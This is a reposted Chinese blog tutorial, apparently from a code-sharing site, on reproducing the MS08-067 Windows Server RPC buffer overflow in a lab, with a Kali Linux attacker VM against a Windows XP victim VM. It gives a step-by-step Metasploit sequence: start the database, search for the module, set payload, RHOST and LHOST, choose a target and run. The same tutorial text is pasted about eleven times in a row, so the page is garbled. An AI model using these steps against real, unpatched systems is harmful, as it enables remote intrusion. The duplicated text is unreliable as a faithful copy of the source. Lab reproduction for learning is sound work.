Kali Linux滲透實戰-MS08-067漏洞攻防實戰竅門


感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088.html
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run
感謝參考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
Kali Linux滲透實戰篇【二】:復現MS08-067漏洞攻防實戰技巧

一、MS08-067是什么

MS08-067漏洞的全稱為“Windows Server服務RPC請求緩沖區溢出漏洞”,如果用戶在受影響的系統上收到特制的 RPC 請求,則該漏洞可能允許遠程執行代碼。此漏洞可用於進行蠕蟲攻擊,目前已經有利用該漏洞的蠕蟲病毒。

二、影響操作系統

Windows 2000

WindowsXP

Windows Server 2003

Windows Vista

Windows Server 2008

Windows 7 Pro-Beta。

三、漏洞利用工具

Kali Linux

四、滲透環境准備

1、一台Kali Linux虛擬機,扮演黑客,地址為:192.168.123.128

2、一台Windows xp虛擬機,扮演受害者,地址為:192.168.123.100

保證兩者網絡連通,可試ping一下,不丟包則表示網絡連通性良好。

五、滲透測試實戰

1、打開postgresql數據庫服務器

service postgresql start

初始化數據庫

msfdb init

2、進入MSF終端

輸入:msfconsole

3、搜索漏洞模塊的名稱和信息

search ms08-067

4、加載漏洞模塊

use + 漏洞模塊

5、列出該漏洞模塊下可以使用的載荷

show payloads

6、設置攻擊載荷

set payload + 載荷名稱

7、顯示配置選項

show options

8、設置目標地址

set RHOST + IP地址

9、設置本地地址

set LHOST + IP地址

10、列出所有支持的目標平台

show targets

11、選擇靶機

set target + 數值

12、執行攻擊

run


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM